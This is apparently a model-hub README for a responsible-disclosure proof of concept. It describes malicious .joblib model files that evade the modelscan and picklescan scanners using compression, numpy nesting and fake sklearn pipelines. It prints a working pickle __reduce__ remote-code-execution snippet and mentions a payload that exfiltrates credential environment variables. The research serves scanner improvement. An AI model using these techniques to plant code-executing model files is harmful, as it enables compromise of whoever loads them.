Joblib Scanner Bypass PoC β Security Research Artifacts
WARNING: These files are intentionally malicious model files created for authorized security research. DO NOT load them with
joblib.load()outside of a sandboxed environment. They execute arbitrary code.
Purpose
These 6 .joblib files demonstrate that existing model file scanners (picklescan, modelscan) fail to detect malicious payloads in Joblib model files. This is a responsible disclosure artifact for the huntr MFV program.
Scanner Evasion Results (2026-03-20)
| Payload | Evasion Technique | modelscan 0.8.8 | picklescan 1.0.4 | RCE? |
|---|---|---|---|---|
payload1_zlib_rce.joblib |
zlib compression | MISSED | 0 globals (false neg) | Yes |
payload2_lzma_rce.joblib |
LZMA compression | MISSED | 0 globals (false neg) | Yes |
payload3_hidden_in_numpy.joblib |
Nested in numpy array | MISSED | 0 globals (false neg) | Yes |
payload4_uncompressed.joblib |
Baseline (no compression) | Detected | Detected | Yes |
payload5_exfil_secrets.joblib |
Credential exfiltration | MISSED | 0 globals (false neg) | Yes |
payload6_fake_pipeline.joblib |
sklearn Pipeline mimicry | MISSED | 0 globals (false neg) | Yes |
modelscan misses 5/6 compressed payloads. picklescan reports "0 dangerous globals" on all compressed variants (false negative).
Files
payload1_zlib_rce.joblibβ Standard__reduce__RCE, zlib compressed. Scanners must decompress to detect.payload2_lzma_rce.joblibβ Same payload, LZMA compression. Scanners expecting zlib miss this.payload3_hidden_in_numpy.joblibβ RCE object hidden insidenumpy.ndarray(dtype=object)within a dict that mimics an sklearn model (weights, biases, metadata).payload4_uncompressed.joblibβ No compression. Control sample β scanners should catch this.payload5_exfil_secrets.joblibβ Exfiltrates environment variables matching KEY/SECRET/TOKEN/PASS patterns.payload6_fake_pipeline.joblibβ Payload disguised as sklearn Pipeline with aStandardScaler-like class that has legitimatemean_/scale_attributes.
How They Work
All payloads use Python pickle's __reduce__ protocol to execute code when deserialized:
class Evil:
def __reduce__(self):
return (eval, ("__import__('os').popen('id').read()",))
joblib.dump(Evil(), "payload.joblib", compress=('zlib', 9))
# Loading this file executes 'id' on the host:
result = joblib.load("payload.joblib") # β "uid=1000(user) ..."
The evasion comes from Joblib's compression layer (zlib/LZMA) which transforms pickle opcodes into opaque binary, and from nesting payloads inside legitimate-looking numpy arrays.
Responsible Disclosure
- Disclosed to: huntr MFV program
- Affected: Any system that loads
.joblibfiles from untrusted sources - Scanners affected: modelscan 0.8.8, picklescan 1.0.4
- Researcher: vellaveto
Do Not Use Maliciously
These artifacts exist solely to improve model file security scanning. Using them against systems without authorization is illegal.
- Downloads last month
- 47
We're not able to determine the quantization variants.